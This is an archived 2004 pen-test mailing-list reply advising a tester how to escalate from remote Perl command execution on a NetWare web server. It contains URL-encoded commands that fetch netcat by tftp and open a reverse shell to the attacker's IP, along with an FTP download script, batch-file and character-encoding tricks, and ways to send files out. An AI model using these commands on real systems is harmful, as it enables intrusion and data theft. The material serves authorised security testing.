Re: Escalating from Netware box

From: Dave Nuull (gotodevnull_at_hotmail.com)
Date: 08/15/04

  • Next message: Dinis Cruz: "RE: Client/Server application that does not authenticate users"
    To: pen-test@securityfocus.com
    Date: Sun, 15 Aug 2004 12:02:35 -0400
    
    

    McKenna Henage or Beme Lee wrote:

    >I'm wrapping up a pen-test and I've gained access to a
    >NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl
    >commands using specially crafted URLs (e.g.,
    >"perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts the
    >URLs to allow me to easily read any file on the server, write to any file,
    >or execute any command. However, without any Novell experience (I am a MS
    >and Linux guy), I am unable to escalate to the point of being able to
    >attack
    >other systems on the client's network.

    Aside question: If perl -e is a command line option, why does a simple 'dir'
    not work? Or a cmd%20/C%20dir?

    >Any suggestions for ways I can use this Netware box to further exploit
    >their
    >networks would be very much appreciated. In particular, I'm interested in
    >discovering what other devices are on their network (since I can only see
    >their Netware box from the Internet), performing port scans, vulnerability
    >scans, etc. I need to be nice to the server since it is in production, so
    >I'm trying not to experiment too much on their machine and risk bringing it
    >down (already crashed it once!).

    If you can execute on the remote server, and if there are any 'closed' ports
    (i.e not filtered) then have you tried to tftp up a nc.exe and shovel a
    shell back to your attack host?
    i.e.
       "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);"
       "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"

    If as you say below you cant find the tftp client, what about perl's FTP
    module:
    This one does not contain any " or ' chars so you could echo all the lines
    into
    a file on the remote server and run from the command line.

    use Net::FTP;
    $ftp=Net::FTP->new($ARGV[0]);
    $ftp->login($ARGV[1],$ARGV[2]);
    $ftp->binary();
    $ftp->get($ARGV[3]);
    $ftp->quit();

    >I've already done some research on Netware, including listening to RFP's
    >Black Hat talk on Netware, and reading the "Novell Hacking FAQ" available
    >on
    >the web. Unfortunately most resources I've found refer to Netware 2.x, 3.x,
    >and 4.x. Here is what I've been able to gain so far, thanks to having
    >partial access to files on the system using directory traversal:

    If you have partial access to files (i.e at least read access), could you
    not tftp
    complete files back to your attack host? This again assumes they have not
    configured restrictive outbound filtering on their firewall. If you can
    find their internal mail server, you could craft some SMTP commands and
    mail them to yourself instead :-)

    >-Internal IP address
    >-IPX servers (running the command “display ipx servers”)
    >-See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg
    >(and
    >to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW)
    >-Successfully ping out to a device on the Internet (unfortunately it
    >appears
    >to be continuous, because I wasn’t able to stop it)
    >-…and pretty much anything else that is in a file, or almost any command
    >
    >I have run into some limits:
    >
    >-Any request I make (to read/write a file or execute a command) is limited
    >in character length, hampering my ability to execute an elaborate Perl
    >program on the box or even to read some files that are too far down the
    >directory tree

    If you have a command length limits, perhaps try to create a .bat file on
    the remote server using echo appends and splitting the command into smaller
    sections.
      "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);"
      "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);"
      "perl/-e%20system(%22mycmd.bat%22);"

    >-Haven't found a way to send some characters such as " and ', even after
    >trying everything I could think of (encoding, double encoding, etc.). Wish
    >I
    >could do that because then I could essentially start writing a new Perl
    >script to their machine and overcome the character limitation just
    >mentioned, and potentially find a way to upload a Perl port scanner of some
    >sort.

    If you have perl interpreter access, you could use the pack/unpack functions
    to decode the " or ' chars into decimal/hex/octal and using one liners
    unpack the chars on the remote host. ref: ascii chart for char->hex values
    i.e.
    C:\>perl -e $a=pack(H6,222027);print$a;
    " '

    >-An inability to correctly view all files. Since I'm getting the files fed
    >back in a web browser, I can sometimes only see the first parts of a file
    >(up to 500K or so), and have trouble downloading binaries.
    >
    >-An inability to see the entire results of a command run on the system. I
    >can run a command, but then to see the results I have to open
    >/etc/console.log and read the last few lines (so I can't always see the
    >entire results, because it appears to be cut off in the log).

    Do command output redirections into your own log file not work on the
    server?

    >-I don’t even know how to download files to the Netware box. I have been
    >unable to determine if it has a HTTP or FTP client I can use to pull down a
    >trojan/backdoor program, netcat, or anything else.
    >-Some blockage at the firewall (?). For example, I tried loading the remote
    >console and then accessing it remotely, but it appears to be blocked at the
    >firewall since I can’t get in. If it were a Linux/Unix/Windows box then I’d
    >know how to download a SSH client and reverse-tunnel a connection out
    >through the firewall, but I’m clueless on Netware.
    >
    >Thanks in advance for any suggestions you can provide in the next couple
    >days.
    >
    >Beme Lee

    _________________________________________________________________
    FREE pop-up blocking with the new MSN Toolbar – get it now!
    http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


  • Next message: Dinis Cruz: "RE: Client/Server application that does not authenticate users"

    Relevant Pages

    • Re: dcdiag - advertising errors on newley promoted domain controller
      ... Can you do the following on uksccmads01 ... The problem may actually have nothing to do with the new server but the ... From a command prompt try and see if you get any additional info ... Skipping site UK-CCM, this site is outside the scope ...
      (microsoft.public.windows.server.active_directory)
    • Re: dcdiag - advertising errors on newley promoted domain controller
      ... Can you do the following on uksccmads01 ... The problem may actually have nothing to do with the new server but the ... Active Directory Forest Replication GUIDs Found: ... From a command prompt try and see if you get any additional info ...
      (microsoft.public.windows.server.active_directory)
    • Re: dcdiag - advertising errors on newley promoted domain controller
      ... Default Server: uksccmads01.jw-uk.jameswalker.co.uk ... Output from dnslint on uksccmads01: No erros found, ... Active Directory Forest Replication GUIDs Found: ... From a command prompt try and see if you get any additional info ...
      (microsoft.public.windows.server.active_directory)
    • Re: dcdiag - advertising errors on newley promoted domain controller
      ... Then change the secondary DNS to the other site DNS server. ... Skipping site UK-CCM, this site is outside the scope provided ... command line arguments provided. ...
      (microsoft.public.windows.server.active_directory)
    • Re: dcdiag - advertising errors on newley promoted domain controller
      ... Both forward and reverse zones and server records have the correct IP ... Once you have found the error then on both servers, from a command ... Skipping site UK-CCM, this site is outside the scope provided ...
      (microsoft.public.windows.server.active_directory)